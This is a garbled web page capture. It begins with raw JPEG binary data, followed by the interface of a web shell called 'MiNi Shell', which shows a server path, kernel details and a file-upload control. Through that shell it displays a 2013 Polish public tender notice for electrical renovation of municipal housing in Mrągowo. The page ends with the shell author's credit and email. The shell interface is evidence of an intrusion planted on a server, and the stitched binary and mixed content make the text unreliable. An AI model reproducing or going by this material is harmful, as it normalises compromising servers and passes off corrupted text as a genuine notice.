JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130419/156860-N-2013.html

<p class="kh_header"><b>Mrągowo: Roboty remontowe instalacji elektrycznych w komunalnych budynkach mieszkalnych w Mrągowie 
Mrongowiusza 4, Mrongowiusza 51, Mrongowiusza 57, Królewiecka 31B , Królewiecka 31 C, Bohaterów Warszawy 7, Roosevelta 10</b><br>
<b>Numer ogłoszenia: 156860 - 2013; data zamieszczenia: 19.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Towarzystwo Budownictwa Społecznego "Karo" Sp. z o.o. , ul. Kopernika 11, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 089 7410600, faks 089 7417283.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tbs.mragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe instalacji elektrycznych w komunalnych budynkach mieszkalnych w Mrągowie 
Mrongowiusza 4, Mrongowiusza 51, Mrongowiusza 57, Królewiecka 31B , Królewiecka 31 C, Bohaterów Warszawy 7, Roosevelta 10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia należy wykonać na podstawie opisu przedmiotu zamówienia  z dopełnieniem wszelkich spraw formalnoprawnych dotyczących przedmiotowego zadania.  

Przedmiotem zamówienia jest:  przebudowa układu zasilania instalacji elektrycznej tzw. WLZ wraz z wymianą tablic zabezpieczenia i licznikowych, rozprowadzeniem zasileń do lokali mieszkalnych zakończonych zabezpieczeniami, wymianą instalacji oświetlenia klatek schodowych, strychów i piwnic oraz oświetlenia wejść do budynków, w tym:

1. Mrongowiusza 4/ zasilenie linią napowietrzną; instalacja oświetlenia administracyjnego na 230V/

 1.1 wymiana - remont linii zasilających, tablic bezpiecznikowych i licznikowych dla / 8 lokali mieszkalnych + administracja /
 1.2 rozprowadzenie instalacji do lokali mieszkalnych wraz z montażem tablicy bezpiecznikowej i wpięciem instalacji elektrycznej w mieszkaniach.
 1.3 wymiana instalacji klatki schodowej / 5 sztuk opraw oświetleniowych + 7 włączników - cz. administracyjna/
1.4 wymiana instalacji oświetlenia w pom. gospodarczym-sutenera / 1 oprawa +włącznik-cz. administracyjna
1.5 wymiana instalacji oświetlenia w 2-ch ustępach na klatce schodowej. Instalację z ustępu na półpiętrze I p. podpiąć pod instalację mieszkania nr 1. Instalację z ustępu na półpiętrze II p. podpiąć pod instalację mieszkania nr 3.
1.6 montaż 2-ch opraw zewnętrznych przy wejściach do budynku/ na czujki ruchu- cz. administracyjna/
1.7 wymiana instalacji oświetleniowej w piwnicach/ 8 sztuk opraw oświetlenia boksów piwnicznych+ 8 szt. włączników; 3 sztuki opraw oświetlenia komunikacji piwnicznej+ 1 szt. Włącznik / część administracyjna /.
1.8 zaprawienie bruzd z instalacjami wewnętrznymi wraz z wygładzeniem i odtworzeniem powłok malarskich
 1.9 wprowadzenie w przygotowaną bruzdę istniejącego zewnętrznego zasilenia natynkowego tablicy RBK, wraz z zaprawieniem bruzdy, odtworzeniem warstwy fakturowej i pomalowaniem. 

2/ Mrongowiusza 51/ zasilenie linia napowietrzną; instalacja oświetlenia administracyjnego na 230V/

 2.1 wymiana - remont linii zasilających, tablic bezpiecznikowych i licznikowych dla / 3 lokali mieszkalnych+ administracja /
 2.2 rozprowadzenie instalacji do lokali mieszkalnych wraz z montażem tablicy bezpiecznikowej i wpięciem instalacji elektrycznej w mieszkaniach.
 2.3 wymiana instalacji klatki schodowej / 3 sztuki opraw oświetleniowych (z odzysku)+2 włączniki - cz. administracyjna/
 2.4  montaż oprawy zewnętrznej przy wejściu do budynku/ czujka ruchu- cz. administracyjna/
 2.5.wymiana instalacji oświetleniowej i gniazd w piwnicy/ 2 sztuki opraw oświetlenia boksów piwnicznych+ 2 szt. włączników; 2 sztuki gniazd natynkowych do kotła co i zamrażarki. Instalacje piwnicy podpiąć pod instalacje mieszkania nr 1.
 2.6 zaprawienie bruzd z instalacjami wewnętrznymi wraz z wygładzeniem pod malowanie/ bez odtworzenia powłok malarskich/
 2.7 wprowadzenie w przygotowaną bruzdę istniejącego zewnętrznego zasilenia natynkowego tablicy RBK, wraz z zaprawieniem bruzdy oraz naprawa osadzenia skrzynki RBK/ bez odtwarzania faktury i powłok malarskich /.

3/ Mrongowiusza 57/ zasilenie linią napowietrzną; instalacji oświetlenia administracyjnego - brak/

 3.1 wymiana linii zasilających, tablic bezpiecznikowych i licznikowych dla/ 2 lokale mieszkalne+ administracja/
3.2 rozprowadzenie instalacji do lokali mieszkalnych wraz z montażem tablicy bezpiecznikowej i wpięciem instalacji elektrycznej w mieszkaniach.
3.3 wymiana instalacji wiatrołapu i klatki schodowej, w tym:
    - 1 sztuka oprawy oświetlenia wiatrołapu / czujka ruchu- cz. administracyjna/
    - 1 sztuka oprawy oświetlenia klatki schodowej+ 2 włączniki schodowe. Instalację oświetlenia klatki schodowej podpiąć pod instalację mieszkania nr 2.
3.4  montaż oprawy zewnętrznej przy wejściu do budynku/ czujka ruchu- cz. administracyjna/
3.5 wymiana instalacji oświetleniowej piwnic/ 4 sztuki opraw oświetleniowych+ 3 włączniki- część administracyjna/
3.6 zaprawienie bruzd z instalacjami wewnętrznymi wraz z wygładzeniem oraz odtworzeniem powłok malarskich.
3.7 zaprawienie bruzdy na elewacji budynku wraz z odtworzeniem powłok malarskich , po montażu zewnętrznej linii zasilającej.

4/ Królewiecka 31B/ zasilenie z budynku Królewiecka 31A-złącze kablowe; instalacji oświetlenia administracyjnego - brak/

4.1 wymiana wewnętrznej linii zasilającej, tablic bezpiecznikowych i licznikowych dla/ 2 lokale mieszkalne+ administracja/.
4.2 rozprowadzenie instalacji do lokali mieszkalnych wraz z montażem tablic bezpiecznikowych i wpięciem instalacji elektrycznej w mieszkaniach.
4.3 wymiana instalacji przedsionka wejściowego i klatki schodowej, w tym:
    - 1 sztuka oprawy oświetlenia przedsionka / czujka ruchu- cz. administracyjna/
    - 1 sztuka oprawy oświetlenia klatki schodowej+ 2 włączniki schodowe. Instalację oświetlenia klatki schodowej podpiąć pod instalację mieszkania nr 2.
4.4  montaż oprawy zewnętrznej przy wejściu do budynku/ czujka ruchu- cz. administracyjna/.
4.5.wymiana instalacji oświetleniowej i gniazd w piwnicy/ 3 sztuki opraw oświetlenia pom. piwnicznych+ 1 szt. włączników; 2 sztuki gniazd natynkowych - do kotła co i sprzętu elektrycznego. Instalacje piwnicy podpiąć pod instalacje mieszkania nr 1.

5/ Królewiecka 31C/ zasilenie i licznik pomiarowy z budynku Królewiecka 31A-złącze kablowe; instalacji oświetlenia administracyjnego - brak/.

5.1 likwidacja istniejącej linii zasilającej wraz z likwidacją i przeniesieniem tablicy licznikowej ulokowanej w budynku wspólnoty mieszkaniowej -Królewiecka 31A, do budynku-Królewiecka 31C.
5.2 budowa nowej linii zasilającej wraz z tablicą bezpiecznikową i licznikową dla/ 1 lokal mieszkalny. Nie przewiduje się obwodów administracyjnych!
5.3 doprowadzenie instalacji do lokalu mieszkalnego wraz z montażem tablicy bezpiecznikowej i wpięciem instalacji w mieszkaniu.
5.4 wykonanie instalacji oświetlenia wejścia zewnętrznego do budynku+ oświetlenie wewnątrz wiatrołapu/ 2 sztuk opraw z włącznikami/.

6/ Boh. Warszawy 7/ zasilenie linią kablową; instalacja oświetlenia administracyjnego   na 24V/.

6.1 wymiana - remont linii zasilających, tablic bezpiecznikowych i licznikowych dla/ 4 lokali mieszkalnych+ administracja/.
6.2 rozprowadzenie instalacji do lokali mieszkalnych wraz z montażem tablic bezpiecznikowych i wpięciem instalacji elektrycznej w mieszkaniach.
6.3 wymiana instalacji klatki schodowej/ 3 sztuki opraw oświetleniowych+4 sztuki włączników- cz. administracyjna/.
6.4 montaż oprawy oświetlenia wejścia zewnętrznego do budynku/ 1 sztuka na włącznik- cz. administracyjna/.
6.5 wymiana instalacji oświetleniowej w piwnicach/ 4 sztuki opraw oświetlenia boksów piwnicznych+ 4 szt. włączników; 3 sztuki opraw oświetlenia komunikacji piwnicznej+ 1 szt. włącznik/ część administracyjna/.
6.6 wymiana instalacji oświetlenia pomieszczenia strychowego/ 1 sztuka opraw z włącznikiem-część administracyjna/.
Istniejący transformator napięcia230/24V-do wbudowania.

7/ Roosevelta 10/ zasilenie linią napowietrzną; instalacja oświetlenia administracyjnego na 230/24 V/.

7.1 Modernizacja istniejących wewnętrznych linii zasilających/w obrębie tablic/ wraz z tablicami bezpiecznikowymi i licznikowymi dla / 9 lokali mieszkalnych+ administracja/. Linie zasilające od złącza napowietrznego-wykonane w okresie poprzednim.
7.2 rozprowadzenie instalacji do lokalu mieszkalnego nr 2 wraz z montażem tablicy bezpiecznikowej i wpięciem instalacji elektrycznej w mieszkaniu. Pozostałe lokale mieszkalne posiadają wykonane zasilenia z zabezpieczeniami.
7.3 wymiana instalacji klatki schodowej/ 5 sztuk opraw oświetleniowych+5 włączników- cz. administracyjna/. 
7.4 wymiana instalacji oświetlenia korytarza wspólnego na parterze wraz z ustępem/ 2 sztuki opraw oświetleniowych+ 2 szt. włączników/.
7.5 montaż 1 oprawy zewnętrznej przy wejściach do budynku/ 1 sztuka oprawy z włącznikiem- cz. administracyjna/.
7.6 wymiana instalacji oświetleniowej w piwnicach/ 9 sztuk opraw oświetlenia boksów piwnicznych+ 9 szt. włączników; 5 sztuk opraw oświetlenia komunikacji piwnicznej+ 1 szt. włącznik/ część administracyjna/. 5 sztuk opraw oświetleniowych na komunikacji piwnicznej (z odzysku).
Istniejący transformator napięcia 230/24 V- do wbudowania.
Nowa instalacja oświetlenia części wspólnych na poddaszu pozostaje bez zmian.

Czynności uzupełniające: 
- sporządzenie i uzgodnienie schematów przebudowy instalacji z ZE
- dostosowanie instalacji oświetlenia komunikacji, klatek schodowych, strychów i piwnic do napięcia 24V.
- montaż bezpieczników za-licznikowych w lokalach mieszkalnych
- wyposażenie tablic administracyjnych w gniazdo 230V z zabezpieczeniem przed dostępem osób postronnych.
- demontaż wszystkich natynkowych, starych, nieużytecznych instalacji i osprzętu/ instalacje podtynkowe pozostają/.
- zwrot dla Inwestora użytecznego osprzętu/ np. oprawy, klosze, itp./
- wkucie- w przypadku możliwości- nowych tablic w płaszczyznach ścian
- oplombowanie i przepięcie instalacji - w koordynacji z ZE
- sporządzenie pomiarów instalacji elektrycznej
- zawarcie w imieniu Zamawiającego stosownych umów o dostawę energii do lokali mieszkalnych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.  Zamawiający uzna warunek za spełniony, jeżeli Wykonawca dostarczy przedmiotowe oświadczenie (branża elektryczna). Zamawiający dokona oceny spełnienia warunku na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, iż w przypadku gdy złożona oferta będzie najkorzystniejsza w przedmiotowym postępowaniu  to w dniu podpisania umowy Wykonawca dostarczy Zamawiającemu opłaconą polisę ubezpieczeniową , a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na okres obejmujący czas realizacji przedmiotu zamówienia. Zamawiający uzna warunek za spełniony jeżeli Wykonawca dostarczy oświadczenie j.w. Zamawiający dokona oceny spełnienia warunku na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku wnoszenia oferty wspólnej przez dwa podmioty gospodarcze lub więcej podmiotów, każdy wykonawca oddzielnie nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1, a także musi spełniać wymogi oraz łączne warunki o których mowa w art. 22 ust. 1 ustawy Pzp. (należy przedłożyć dokumenty dotyczące tych podmiotów w zakresie wymaganym dla Wykonawcy). 

Podmioty chcące wspólnie ubiegać się o zamówienie muszą dostarczyć podpisany list intencyjny i ustanowić wspólnego pełnomocnika (art. 23 ustawy Pzp). Ponoszą one solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia określoną w art. 366 Kodeksu cywilnego.

Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tych podmiotów w zakresie wymaganym dla Wykonawcy.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b ustawy Pzp).  

wypełniony formularz ofertowy, 

upoważnienie dla osoby uprawnionej do składania oświadczeń woli w imieniu Wykonawcy (należy dostarczyć pełnomocnictwo dla osoby podpisującej ofertę w formie oryginału lub kserokopii potwierdzonej notarialnie; nie dotyczy władz statutowych firmy Wykonawcy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany zawartej już umowy w przypadku:  
           
rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia okoliczności, w których zbędne będzie wykonanie danej części zamówienia (roboty zaniechane), wraz z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony kosztorys ofertowy,

wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w trakcie realizacji prac - nie powodujących zwiększenia ceny umownej,   
 
powierzenia podwykonawcy innej części prac niż wskazana w ofercie Wykonawcy, zmiana lub konieczność dodatkowego wprowadzenia na plac budowy podwykonawcy - nie powodująca zwiększenia ceny umownej  i za uprzednią zgodą Zamawiającego,

wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami i warunkami, technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach,

miany przez władzę ustawodawczą procentowej stawki podatku VAT.   
    
W następstwie w.w. może ulec zmianie: uzgodnione pierwotnie wynagrodzenie lub umowny termin  
   wykonania zamówienia.  

   Warunki zmian:
inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, 
zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną 
w formie pisemnej pod rygorem nieważności, przy zachowaniu postanowień art. 144 Ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tbs.mragowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Towarzystwo Budownictwa Społecznego KARO Sp. z o.o., 11-700 Mragowo, ul. Kopernika 11 (pokój nr 9).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2013 godzina 10:30, miejsce: Towarzystwo Budownictwa Społecznego KARO Sp. z o.o., 11-700 Mragowo,        ul. Kopernika 11 (pokój nr 13).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com